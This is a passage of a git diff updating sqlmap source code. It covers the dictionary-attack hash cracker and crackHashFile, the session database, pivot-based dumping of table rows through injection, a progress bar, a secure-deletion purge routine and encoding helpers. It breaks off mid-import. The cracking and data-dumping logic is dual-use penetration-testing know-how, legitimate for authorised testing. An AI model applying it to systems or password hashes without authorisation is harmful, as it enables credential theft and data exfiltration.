salt and/or username) + if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC, HASH.SHA224_GENERIC, HASH.SHA256_GENERIC, HASH.SHA384_GENERIC, HASH.SHA512_GENERIC, HASH.APACHE_SHA1): for suffix in suffix_list: if not attack_info or processException: break @@ -721,51 +1182,38 @@ def dictionaryAttack(attack_dict): infoMsg = "starting %d processes " % _multiprocessing.cpu_count() singleTimeLogMessage(infoMsg) + gc.disable() + retVal = _multiprocessing.Queue() count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) for i in xrange(_multiprocessing.cpu_count()): - p = _multiprocessing.Process(target=_bruteProcessVariantA, args=(attack_info, hash_regex, suffix, retVal, i, count, kb.wordlists, custom_wordlist)) - processes.append(p) + process = _multiprocessing.Process(target=_bruteProcessVariantA, args=(attack_info, hash_regex, suffix, retVal, i, count, kb.wordlists, custom_wordlist, conf.api)) + processes.append(process) - for p in processes: - p.start() + for process in processes: + process.daemon = True + process.start() - for p in processes: - p.join() + while count.value > 0: + time.sleep(0.5) else: warnMsg = "multiprocessing hash cracking is currently " - warnMsg += "not supported on this platform" + warnMsg += "%s on this platform" % ("not supported" if not conf.disableMulti else "disabled") singleTimeWarnMessage(warnMsg) - retVal = Queue() - _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, 0, 1, kb.wordlists, custom_wordlist) + retVal = _queue.Queue() + _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, 0, 1, kb.wordlists, custom_wordlist, conf.api) except KeyboardInterrupt: - print + print() processException = True warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)" - logger.warn(warnMsg) - - for process in processes: - try: - process.terminate() - process.join() - except OSError: - pass + logger.warning(warnMsg) finally: - if retVal: - conf.hashDB.beginTransaction() - - while not retVal.empty(): - user, hash_, word = item = retVal.get(block=False) - attack_info = filter(lambda _: _[0][0] != user or _[0][1] != hash_, attack_info) - hashDBWrite(hash_, word) - results.append(item) - - conf.hashDB.endTransaction() + _finalize(retVal, results, processes, attack_info) clearConsoleLine() @@ -798,73 +1246,85 @@ def dictionaryAttack(attack_dict): infoMsg = "starting %d processes " % _multiprocessing.cpu_count() singleTimeLogMessage(infoMsg) + gc.disable() + retVal = _multiprocessing.Queue() found_ = _multiprocessing.Value('i', False) count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) for i in xrange(_multiprocessing.cpu_count()): - p = _multiprocessing.Process(target=_bruteProcessVariantB, args=(user, hash_, kwargs, hash_regex, suffix, retVal, found_, i, count, kb.wordlists, custom_wordlist)) - processes.append(p) + process = _multiprocessing.Process(target=_bruteProcessVariantB, args=(user, hash_, kwargs, hash_regex, suffix, retVal, found_, i, count, kb.wordlists, custom_wordlist, conf.api)) + processes.append(process) - for p in processes: - p.start() + for process in processes: + process.daemon = True + process.start() - for p in processes: - p.join() + while count.value > 0: + time.sleep(0.5) found = found_.value != 0 else: warnMsg = "multiprocessing hash cracking is currently " - warnMsg += "not supported on this platform" + warnMsg += "%s on this platform" % ("not supported" if not conf.disableMulti else "disabled") singleTimeWarnMessage(warnMsg) - class Value(): + class 
Value(object): pass - retVal = Queue() + retVal = _queue.Queue() found_ = Value() found_.value = False - _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found_, 0, 1, kb.wordlists, custom_wordlist) + _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found_, 0, 1, kb.wordlists, custom_wordlist, conf.api) found = found_.value except KeyboardInterrupt: - print + print() processException = True warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)" - logger.warn(warnMsg) + logger.warning(warnMsg) for process in processes: try: process.terminate() process.join() - except OSError: + except (OSError, AttributeError): pass finally: - if retVal: - conf.hashDB.beginTransaction() - - while not retVal.empty(): - user, hash_, word = item = retVal.get(block=False) - hashDBWrite(hash_, word) - results.append(item) - - conf.hashDB.endTransaction() + _finalize(retVal, results, processes, attack_info) clearConsoleLine() results.extend(resumes) - if len(hash_regexes) == 0: - warnMsg = "unknown hash format. " - warnMsg += "Please report by e-mail to %s" % ML - logger.warn(warnMsg) + if foundHash and len(hash_regexes) == 0: + warnMsg = "unknown hash format" + logger.warning(warnMsg) if len(results) == 0: warnMsg = "no clear password(s) found" - logger.warn(warnMsg) + logger.warning(warnMsg) return results + +def crackHashFile(hashFile): + i = 0 + attack_dict = {} + + check = None + for line in getFileItems(conf.hashFile): + if check is None and not attack_dict and ':' in line: + check = any(re.search(_, line) for _ in getPublicTypeMembers(HASH, True)) + + if ':' in line and check is False: + user, hash_ = line.split(':', 1) + attack_dict[user] = [hash_] + else: + attack_dict["%s%d" % (DUMMY_USER_PREFIX, i)] = [line] + i += 1 + + dictionaryAttack(attack_dict) diff --git a/lib/utils/hashdb.py b/lib/utils/hashdb.py index 4e3f1a4e6b2..e7a88fc22cd 100644 --- a/lib/utils/hashdb.py +++ b/lib/utils/hashdb.py @@ -1,108 +1,168 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import hashlib import os import sqlite3 +import struct import threading import time -from lib.core.common import getUnicode +from lib.core.common import getSafeExString from lib.core.common import serializeObject +from lib.core.common import singleTimeWarnMessage from lib.core.common import unserializeObject +from lib.core.compat import xrange +from lib.core.convert import getBytes +from lib.core.convert import getUnicode from lib.core.data import logger -from lib.core.exception import SqlmapDataException +from lib.core.datatype import LRUDict +from lib.core.exception import SqlmapConnectionException +from lib.core.settings import HASHDB_END_TRANSACTION_RETRIES from lib.core.settings import HASHDB_FLUSH_RETRIES -from lib.core.settings import HASHDB_FLUSH_THRESHOLD -from lib.core.settings import UNICODE_ENCODING +from lib.core.settings import HASHDB_FLUSH_THRESHOLD_ITEMS +from lib.core.settings import HASHDB_FLUSH_THRESHOLD_TIME +from lib.core.settings import HASHDB_RETRIEVE_RETRIES +from lib.core.settings import IS_PYPY from lib.core.threads import getCurrentThreadData -from lib.core.threads import getCurrentThreadName +from thirdparty import six class HashDB(object): def __init__(self, filepath): self.filepath = filepath self._write_cache = {} + self._read_cache = 
LRUDict(capacity=100) self._cache_lock = threading.Lock() + self._connections = [] + self._last_flush_time = time.time() def _get_cursor(self): threadData = getCurrentThreadData() if threadData.hashDBCursor is None: try: - connection = sqlite3.connect(self.filepath, timeout=3, isolation_level=None) + connection = sqlite3.connect(self.filepath, timeout=10, isolation_level=None, check_same_thread=False) + if not IS_PYPY: + connection.execute("PRAGMA journal_mode=WAL") + connection.execute("PRAGMA synchronous=NORMAL") + connection.execute("PRAGMA busy_timeout=10000") + self._connections.append(connection) threadData.hashDBCursor = connection.cursor() threadData.hashDBCursor.execute("CREATE TABLE IF NOT EXISTS storage (id INTEGER PRIMARY KEY, value TEXT)") - except Exception, ex: + connection.commit() + except Exception as ex: errMsg = "error occurred while opening a session " - errMsg += "file '%s' ('%s')" % (self.filepath, ex) - raise SqlmapDataException(errMsg) + errMsg += "file '%s' ('%s')" % (self.filepath, getSafeExString(ex)) + raise SqlmapConnectionException(errMsg) return threadData.hashDBCursor - cursor = property(_get_cursor) + def _set_cursor(self, cursor): + threadData = getCurrentThreadData() + threadData.hashDBCursor = cursor + + cursor = property(_get_cursor, _set_cursor) def close(self): threadData = getCurrentThreadData() try: if threadData.hashDBCursor: + if self._write_cache: + self.flush() + threadData.hashDBCursor.close() threadData.hashDBCursor.connection.close() threadData.hashDBCursor = None except: pass + def closeAll(self): + if self._write_cache: + self.flush() + + for connection in self._connections: + try: + connection.close() + except: + pass + @staticmethod def hashKey(key): - key = key.encode(UNICODE_ENCODING) if isinstance(key, unicode) else repr(key) - retVal = int(hashlib.md5(key).hexdigest()[:8], 16) + key = getBytes(key if isinstance(key, six.text_type) else repr(key), errors="xmlcharrefreplace") + retVal = struct.unpack("<Q", hashlib.md5(key).digest()[:8])[0] & 0x7fffffffffffffff return retVal def retrieve(self, key, unserialize=False): retVal = None - if key and (self._write_cache or os.path.isfile(self.filepath)): + + if key and (self._write_cache or self._connections or os.path.isfile(self.filepath)): hash_ = HashDB.hashKey(key) retVal = self._write_cache.get(hash_) + + if retVal is None: + retVal = self._read_cache.get(hash_) + if not retVal: - while True: + for _ in xrange(HASHDB_RETRIEVE_RETRIES): try: for row in self.cursor.execute("SELECT value FROM storage WHERE id=?", (hash_,)): retVal = row[0] - except sqlite3.OperationalError, ex: - if not 'locked' in ex.message: - raise + except (sqlite3.OperationalError, sqlite3.DatabaseError) as ex: + if any(_ in getSafeExString(ex) for _ in ("locked", "no such table")): + warnMsg = "problem occurred while accessing session file '%s' ('%s')" % (self.filepath, getSafeExString(ex)) + singleTimeWarnMessage(warnMsg) + elif "Could not decode" in getSafeExString(ex): + break + else: + errMsg = "error occurred while accessing session file '%s' ('%s'). 
" % (self.filepath, getSafeExString(ex)) + errMsg += "If the problem persists please rerun with '--flush-session'" + raise SqlmapConnectionException(errMsg) else: break - return retVal if not unserialize else unserializeObject(retVal) + + time.sleep(1) + + if retVal is not None: + self._read_cache[hash_] = retVal + + if retVal and unserialize: + try: + retVal = unserializeObject(retVal) + except: + retVal = None + warnMsg = "error occurred while unserializing value for session key '%s'. " % key + warnMsg += "If the problem persists please rerun with '--flush-session'" + logger.warning(warnMsg) + + return retVal def write(self, key, value, serialize=False): if key: hash_ = HashDB.hashKey(key) - self._cache_lock.acquire() - self._write_cache[hash_] = getUnicode(value) if not serialize else serializeObject(value) - self._cache_lock.release() + with self._cache_lock: + self._write_cache[hash_] = self._read_cache[hash_] = getUnicode(value) if not serialize else serializeObject(value) + cache_size = len(self._write_cache) + time_since_flush = time.time() - self._last_flush_time - if getCurrentThreadName() in ('0', 'MainThread'): - self.flush() - - def flush(self, forced=False): - if not self._write_cache: - return + if cache_size >= HASHDB_FLUSH_THRESHOLD_ITEMS or time_since_flush >= HASHDB_FLUSH_THRESHOLD_TIME: + self.flush() - if not forced and len(self._write_cache) < HASHDB_FLUSH_THRESHOLD: - return + def flush(self): + with self._cache_lock: + if not self._write_cache: + return - self._cache_lock.acquire() - _ = self._write_cache - self._write_cache = {} - self._cache_lock.release() + flush_cache = self._write_cache + self._write_cache = {} + self._last_flush_time = time.time() try: self.beginTransaction() - for hash_, value in _.items(): + for hash_, value in flush_cache.items(): retries = 0 while True: try: @@ -110,12 +170,19 @@ def flush(self, forced=False): self.cursor.execute("INSERT INTO storage VALUES (?, ?)", (hash_, value,)) except sqlite3.IntegrityError: self.cursor.execute("UPDATE storage SET value=? WHERE id=?", (value, hash_,)) - except sqlite3.OperationalError, ex: - - if retries == 0: + except (UnicodeError, OverflowError): # e.g. 
surrogates not allowed (Issue #3851) + break + except sqlite3.DatabaseError as ex: + if not os.path.exists(self.filepath): + debugMsg = "session file '%s' does not exist" % self.filepath + logger.debug(debugMsg) + break + + # NOTE: skipping the retries == 0 for graceful resolution of multi-threaded runs + if retries == 1: warnMsg = "there has been a problem while writing to " - warnMsg += "the session file ('%s')" % ex.message - logger.warn(warnMsg) + warnMsg += "the session file ('%s')" % getSafeExString(ex) + logger.warning(warnMsg) if retries >= HASHDB_FLUSH_RETRIES: return @@ -130,15 +197,43 @@ def flush(self, forced=False): def beginTransaction(self): threadData = getCurrentThreadData() if not threadData.inTransaction: - self.cursor.execute('BEGIN TRANSACTION') - threadData.inTransaction = True + try: + self.cursor.execute("BEGIN TRANSACTION") + except: + try: + # Reference: http://stackoverflow.com/a/25245731 + self.cursor.close() + except sqlite3.ProgrammingError: + pass + threadData.hashDBCursor = None + self.cursor.execute("BEGIN TRANSACTION") + finally: + threadData.inTransaction = True def endTransaction(self): threadData = getCurrentThreadData() if threadData.inTransaction: + retries = 0 + while retries < HASHDB_END_TRANSACTION_RETRIES: + try: + self.cursor.execute("END TRANSACTION") + threadData.inTransaction = False + except sqlite3.OperationalError: + pass + except sqlite3.ProgrammingError: + self.cursor = None + threadData.inTransaction = False + return + else: + return + + retries += 1 + time.sleep(1) + try: - self.cursor.execute('END TRANSACTION') + self.cursor.execute("ROLLBACK TRANSACTION") except sqlite3.OperationalError: - pass + self.cursor.close() + self.cursor = None finally: threadData.inTransaction = False diff --git a/lib/utils/pivotdumptable.py b/lib/utils/pivotdumptable.py index fd055430b05..70d139ee244 100644 --- a/lib/utils/pivotdumptable.py +++ b/lib/utils/pivotdumptable.py @@ -1,31 +1,42 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -from extra.safe2bin.safe2bin import safechardecode +import re + from lib.core.agent import agent from lib.core.bigarray import BigArray from lib.core.common import Backend +from lib.core.common import filterNone +from lib.core.common import getSafeExString from lib.core.common import isNoneValue from lib.core.common import isNumPosStrValue from lib.core.common import singleTimeWarnMessage from lib.core.common import unArrayizeValue from lib.core.common import unsafeSQLIdentificatorNaming +from lib.core.compat import xrange +from lib.core.convert import getUnicode from lib.core.data import conf +from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries +from lib.core.dicts import DUMP_REPLACEMENTS from lib.core.enums import CHARSET_TYPE from lib.core.enums import EXPECTED from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapNoneDataException from lib.core.settings import MAX_INT +from lib.core.settings import NULL +from lib.core.settings import SINGLE_QUOTE_MARKER from lib.core.unescaper import unescaper from lib.request import inject +from lib.utils.safe2bin import safechardecode +from thirdparty.six import unichr as _unichr -def pivotDumpTable(table, colList, count=None, blind=True): +def pivotDumpTable(table, colList, count=None, 
blind=True, alias=None): lengths = {} entries = {} @@ -36,9 +47,10 @@ def pivotDumpTable(table, colList, count=None, blind=True): if count is None: query = dumpNode.count % table + query = agent.whereQuery(query) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if blind else inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT) - if isinstance(count, basestring) and count.isdigit(): + if hasattr(count, "isdigit") and count.isdigit(): count = int(count) if count == 0: @@ -58,66 +70,91 @@ def pivotDumpTable(table, colList, count=None, blind=True): lengths[column] = 0 entries[column] = BigArray() - colList = filter(None, sorted(colList, key=lambda x: len(x) if x else MAX_INT)) - - for column in colList: - infoMsg = "fetching number of distinct " - infoMsg += "values for column '%s'" % column - logger.info(infoMsg) - - query = dumpNode.count2 % (column, table) - value = inject.getValue(query, blind=blind, union=not blind, error=not blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if isNumPosStrValue(value): - validColumnList = True + colList = filterNone(sorted(colList, key=lambda x: len(x) if x else MAX_INT)) - if value == count: - infoMsg = "using column '%s' as a pivot " % column + if conf.pivotColumn: + for _ in colList: + if re.search(r"(.+\.)?%s" % re.escape(conf.pivotColumn), _, re.I): + infoMsg = "using column '%s' as a pivot " % conf.pivotColumn infoMsg += "for retrieving row data" logger.info(infoMsg) - validPivotValue = True + colList.remove(_) + colList.insert(0, _) - colList.remove(column) - colList.insert(0, column) + validPivotValue = True break - if not validColumnList: - errMsg = "all column name(s) provided are non-existent" - raise SqlmapNoneDataException(errMsg) + if not validPivotValue: + warnMsg = "column '%s' not " % conf.pivotColumn + warnMsg += "found in table '%s'" % table + logger.warning(warnMsg) if not validPivotValue: - warnMsg = "no proper pivot column provided (with unique values)." - warnMsg += " It won't be possible to retrieve all rows" - logger.warn(warnMsg) + for column in colList: + infoMsg = "fetching number of distinct " + infoMsg += "values for column '%s'" % column.replace(("%s." % alias) if alias else "", "") + logger.info(infoMsg) + + query = dumpNode.count2 % (column, table) + query = agent.whereQuery(query) + value = inject.getValue(query, blind=blind, union=not blind, error=not blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + + if isNumPosStrValue(value): + validColumnList = True + + if value == count: + infoMsg = "using column '%s' as a pivot " % column.replace(("%s." % alias) if alias else "", "") + infoMsg += "for retrieving row data" + logger.info(infoMsg) + + validPivotValue = True + colList.remove(column) + colList.insert(0, column) + break + + if not validColumnList: + errMsg = "all provided column name(s) are non-existent" + raise SqlmapNoneDataException(errMsg) + + if not validPivotValue: + warnMsg = "no proper pivot column provided (with unique values)." 
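When no pivot column is supplied via `conf.pivotColumn`, the loop above probes `COUNT(DISTINCT column)` for each candidate and picks the first column whose distinct count equals the total row count. A self-contained sketch of that selection rule, run against a local SQLite table instead of through sqlmap's injection primitives (`choose_pivot` is a hypothetical helper):

```python
import sqlite3

def choose_pivot(cursor, table, columns):
    # Prefer shorter column names first, then require uniqueness
    # (distinct count == total row count), mirroring the logic above.
    total = cursor.execute("SELECT COUNT(*) FROM %s" % table).fetchone()[0]
    for column in sorted(columns, key=len):
        distinct = cursor.execute("SELECT COUNT(DISTINCT %s) FROM %s" % (column, table)).fetchone()[0]
        if distinct == total:
            return column
    return None  # no proper pivot column (with unique values)

cursor = sqlite3.connect(":memory:").cursor()
cursor.execute("CREATE TABLE users (id INTEGER, name TEXT)")
cursor.executemany("INSERT INTO users VALUES (?, ?)", [(1, "foo"), (2, "foo"), (3, "bar")])
print(choose_pivot(cursor, "users", ["name", "id"]))  # -> "id"
```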
+ warnMsg += " It won't be possible to retrieve all rows" + logger.warning(warnMsg) pivotValue = " " breakRetrieval = False + def _(column, pivotValue): + if column == colList[0]: + query = dumpNode.query.replace("'%s'" if unescaper.escape(pivotValue, False) != pivotValue else "%s", "%s") % (agent.preprocessField(table, column), table, agent.preprocessField(table, column), unescaper.escape(pivotValue, False)) + else: + query = dumpNode.query2.replace("'%s'" if unescaper.escape(pivotValue, False) != pivotValue else "%s", "%s") % (agent.preprocessField(table, column), table, agent.preprocessField(table, colList[0]), unescaper.escape(pivotValue, False) if SINGLE_QUOTE_MARKER not in dumpNode.query2 else pivotValue) + + query = agent.whereQuery(query) + return unArrayizeValue(inject.getValue(query, blind=blind, time=blind, union=not blind, error=not blind)) + try: for i in xrange(count): if breakRetrieval: break for column in colList: - def _(pivotValue): - if column == colList[0]: - query = dumpNode.query.replace("'%s'", "%s") % (agent.preprocessField(table, column), table, agent.preprocessField(table, column), unescaper.escape(pivotValue, False)) - else: - query = dumpNode.query2.replace("'%s'", "%s") % (agent.preprocessField(table, column), table, agent.preprocessField(table, colList[0]), unescaper.escape(pivotValue, False)) - - return unArrayizeValue(inject.getValue(query, blind=blind, time=blind, union=not blind, error=not blind)) - - value = _(pivotValue) + value = _(column, pivotValue) if column == colList[0]: if isNoneValue(value): - for pivotValue in filter(None, (" " if pivotValue == " " else None, "%s%s" % (pivotValue[0], unichr(ord(pivotValue[1]) + 1)) if len(pivotValue) > 1 else None, unichr(ord(pivotValue[0]) + 1))): - value = _(pivotValue) - if not isNoneValue(value): - break - if isNoneValue(value): + try: + for pivotValue in filterNone((" " if pivotValue == " " else None, "%s%s" % (pivotValue[0], _unichr(ord(pivotValue[1]) + 1)) if len(pivotValue) > 1 else None, _unichr(ord(pivotValue[0]) + 1))): + value = _(column, pivotValue) + if not isNoneValue(value): + break + except ValueError: + pass + + if isNoneValue(value) or value == NULL: breakRetrieval = True break + pivotValue = safechardecode(value) if conf.limitStart or conf.limitStop: @@ -132,18 +169,20 @@ def _(pivotValue): value = "" if isNoneValue(value) else unArrayizeValue(value) - lengths[column] = max(lengths[column], len(value) if value else 0) + lengths[column] = max(lengths[column], len(DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value)))) entries[column].append(value) except KeyboardInterrupt: + kb.dumpKeyboardInterrupt = True + warnMsg = "user aborted during enumeration. sqlmap " warnMsg += "will display partial output" - logger.warn(warnMsg) + logger.warning(warnMsg) - except SqlmapConnectionException, e: - errMsg = "connection exception detected. sqlmap " + except SqlmapConnectionException as ex: + errMsg = "connection exception detected ('%s'). 
sqlmap " % getSafeExString(ex) errMsg += "will display partial output" - errMsg += "'%s'" % e + logger.critical(errMsg) return entries, lengths diff --git a/lib/core/progress.py b/lib/utils/progress.py similarity index 59% rename from lib/core/progress.py rename to lib/utils/progress.py index 0db932530d6..1bfb10656d9 100644 --- a/lib/core/progress.py +++ b/lib/utils/progress.py @@ -1,13 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -from lib.core.common import getUnicode +from __future__ import division + +import time + from lib.core.common import dataToStdout +from lib.core.convert import getUnicode from lib.core.data import conf +from lib.core.data import kb class ProgressBar(object): """ @@ -16,17 +21,17 @@ class ProgressBar(object): def __init__(self, minValue=0, maxValue=10, totalWidth=None): self._progBar = "[]" - self._oldProgBar = "" self._min = int(minValue) self._max = int(maxValue) - self._span = self._max - self._min + self._span = max(self._max - self._min, 0.001) self._width = totalWidth if totalWidth else conf.progressWidth self._amount = 0 + self._start = None self.update() def _convertSeconds(self, value): seconds = value - minutes = seconds / 60 + minutes = seconds // 60 seconds = seconds - (minutes * 60) return "%.2d:%.2d" % (minutes, seconds) @@ -47,10 +52,10 @@ def update(self, newAmount=0): diffFromMin = float(self._amount - self._min) percentDone = (diffFromMin / float(self._span)) * 100.0 percentDone = round(percentDone) - percentDone = int(percentDone) + percentDone = min(100, int(percentDone)) # Figure out how many hash bars the percentage should be - allFull = self._width - 2 + allFull = self._width - len("100%% [] %s/%s (ETA 00:00)" % (self._max, self._max)) numHashes = (percentDone / 100.0) * allFull numHashes = int(round(numHashes)) @@ -60,26 +65,36 @@ def update(self, newAmount=0): elif numHashes == allFull: self._progBar = "[%s]" % ("=" * allFull) else: - self._progBar = "[%s>%s]" % ("=" * (numHashes - 1), - " " * (allFull - numHashes)) + self._progBar = "[%s>%s]" % ("=" * (numHashes - 1), " " * (allFull - numHashes)) # Add the percentage at the beginning of the progress bar percentString = getUnicode(percentDone) + "%" self._progBar = "%s %s" % (percentString, self._progBar) - def draw(self, eta=0): + def progress(self, newAmount): """ - This method draws the progress bar if it has changed + This method saves item delta time and shows updated progress bar with calculated eta """ - if self._progBar != self._oldProgBar: - self._oldProgBar = self._progBar + if self._start is None or newAmount > self._max: + self._start = time.time() + eta = None + else: + delta = time.time() - self._start + eta = (self._max - self._min) * (1.0 * delta / newAmount) - delta + + self.update(newAmount) + self.draw(eta) + + def draw(self, eta=None): + """ + This method draws the progress bar if it has changed + """ - if eta and self._amount < self._max: - dataToStdout("\r%s %d/%d ETA %s" % (self._progBar, self._amount, self._max, self._convertSeconds(int(eta)))) - else: - blank = " " * (80 - len("\r%s %d/%d" % (self._progBar, self._amount, self._max))) - dataToStdout("\r%s %d/%d%s" % (self._progBar, self._amount, self._max, blank)) + dataToStdout("\r%s %d/%d%s" % (self._progBar, self._amount, self._max, (" (ETA %s)" % (self._convertSeconds(int(eta)) if eta is not 
None else "??:??")))) + if self._amount >= self._max: + dataToStdout("\r%s\r" % (" " * self._width)) + kb.prependFlag = False def __str__(self): """ diff --git a/lib/utils/purge.py b/lib/utils/purge.py new file mode 100644 index 00000000000..b1c0e6cd41e --- /dev/null +++ b/lib/utils/purge.py @@ -0,0 +1,86 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import functools +import os +import random +import shutil +import stat +import string + +from lib.core.common import getSafeExString +from lib.core.common import openFile +from lib.core.compat import xrange +from lib.core.convert import getUnicode +from lib.core.data import logger +from thirdparty.six import unichr as _unichr + +def purge(directory): + """ + Safely removes content from a given directory + """ + + if not os.path.isdir(directory): + warnMsg = "skipping purging of directory '%s' as it does not exist" % directory + logger.warning(warnMsg) + return + + infoMsg = "purging content of directory '%s'..." % directory + logger.info(infoMsg) + + filepaths = [] + dirpaths = [] + + for rootpath, directories, filenames in os.walk(directory): + dirpaths.extend(os.path.abspath(os.path.join(rootpath, _)) for _ in directories) + filepaths.extend(os.path.abspath(os.path.join(rootpath, _)) for _ in filenames) + + logger.debug("changing file attributes") + for filepath in filepaths: + try: + os.chmod(filepath, stat.S_IREAD | stat.S_IWRITE) + except: + pass + + logger.debug("writing random data to files") + for filepath in filepaths: + try: + filesize = os.path.getsize(filepath) + with openFile(filepath, "w+") as f: + f.write("".join(_unichr(random.randint(0, 255)) for _ in xrange(filesize))) + except: + pass + + logger.debug("truncating files") + for filepath in filepaths: + try: + with open(filepath, 'w') as f: + pass + except: + pass + + logger.debug("renaming filenames to random values") + for filepath in filepaths: + try: + os.rename(filepath, os.path.join(os.path.dirname(filepath), "".join(random.sample(string.ascii_letters, random.randint(4, 8))))) + except: + pass + + dirpaths.sort(key=functools.cmp_to_key(lambda x, y: y.count(os.path.sep) - x.count(os.path.sep))) + + logger.debug("renaming directory names to random values") + for dirpath in dirpaths: + try: + os.rename(dirpath, os.path.join(os.path.dirname(dirpath), "".join(random.sample(string.ascii_letters, random.randint(4, 8))))) + except: + pass + + logger.debug("deleting the whole directory tree") + try: + shutil.rmtree(directory) + except OSError as ex: + logger.error("problem occurred while removing directory '%s' ('%s')" % (getUnicode(directory), getSafeExString(ex))) diff --git a/lib/utils/safe2bin.py b/lib/utils/safe2bin.py new file mode 100644 index 00000000000..35d0a77cbac --- /dev/null +++ b/lib/utils/safe2bin.py @@ -0,0 +1,103 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import binascii +import re +import string +import sys + +PY3 = sys.version_info >= (3, 0) + +if PY3: + xrange = range + text_type = str + string_types = (str,) + unichr = chr +else: + text_type = unicode + string_types = (basestring,) + +# Regex used for recognition of hex encoded characters +HEX_ENCODED_CHAR_REGEX = r"(?P<result>\\x[0-9A-Fa-f]{2})" + +# Raw chars that will be safe encoded to their slash (\) representations (e.g. 
newline to \n) +SAFE_ENCODE_SLASH_REPLACEMENTS = "\t\n\r\x0b\x0c" + +# Characters that don't need to be safe encoded +SAFE_CHARS = "".join([_ for _ in string.printable.replace('\\', '') if _ not in SAFE_ENCODE_SLASH_REPLACEMENTS]) + +# Prefix used for hex encoded values +HEX_ENCODED_PREFIX = r"\x" + +# Strings used for temporary marking of hex encoded prefixes (to prevent double encoding) +HEX_ENCODED_PREFIX_MARKER = "__HEX_ENCODED_PREFIX__" + +# String used for temporary marking of slash characters +SLASH_MARKER = "__SLASH__" + +def safecharencode(value): + """ + Returns safe representation of a given basestring value + + >>> safecharencode(u'test123') == u'test123' + True + >>> safecharencode(u'test\x01\x02\xaf') == u'test\\\\x01\\\\x02\\xaf' + True + """ + + retVal = value + + if isinstance(value, string_types): + if any(_ not in SAFE_CHARS for _ in value): + retVal = retVal.replace(HEX_ENCODED_PREFIX, HEX_ENCODED_PREFIX_MARKER) + retVal = retVal.replace('\\', SLASH_MARKER) + + for char in SAFE_ENCODE_SLASH_REPLACEMENTS: + retVal = retVal.replace(char, repr(char).strip('\'')) + + for char in set(retVal): + if not (char in string.printable or isinstance(value, text_type) and ord(char) >= 160): + retVal = retVal.replace(char, '\\x%02x' % ord(char)) + + retVal = retVal.replace(SLASH_MARKER, "\\\\") + retVal = retVal.replace(HEX_ENCODED_PREFIX_MARKER, HEX_ENCODED_PREFIX) + elif isinstance(value, list): + for i in xrange(len(value)): + retVal[i] = safecharencode(value[i]) + + return retVal + +def safechardecode(value, binary=False): + """ + Reverse function to safecharencode + """ + + retVal = value + if isinstance(value, string_types): + retVal = retVal.replace('\\\\', SLASH_MARKER) + + while True: + match = re.search(HEX_ENCODED_CHAR_REGEX, retVal) + if match: + retVal = retVal.replace(match.group("result"), unichr(ord(binascii.unhexlify(match.group("result").lstrip("\\x"))))) + else: + break + + for char in SAFE_ENCODE_SLASH_REPLACEMENTS[::-1]: + retVal = retVal.replace(repr(char).strip('\''), char) + + retVal = retVal.replace(SLASH_MARKER, '\\') + + if binary: + if isinstance(retVal, text_type): + retVal = retVal.encode("utf8", errors="surrogatepass" if PY3 else "strict") + + elif isinstance(value, (list, tuple)): + for i in xrange(len(value)): + retVal[i] = safechardecode(value[i]) + + return retVal diff --git a/lib/utils/search.py b/lib/utils/search.py new file mode 100644 index 00000000000..985226891fb --- /dev/null +++ b/lib/utils/search.py @@ -0,0 +1,213 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re +import socket + +from lib.core.common import getSafeExString +from lib.core.common import popValue +from lib.core.common import pushValue +from lib.core.common import readInput +from lib.core.common import urlencode +from lib.core.convert import getBytes +from lib.core.convert import getUnicode +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.decorators import stackedmethod +from lib.core.enums import CUSTOM_LOGGING +from lib.core.enums import HTTP_HEADER +from lib.core.enums import REDIRECTION +from lib.core.exception import SqlmapBaseException +from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapUserQuitException +from lib.core.settings import BING_REGEX +from lib.core.settings import DUCKDUCKGO_REGEX +from lib.core.settings import DUMMY_SEARCH_USER_AGENT +from 
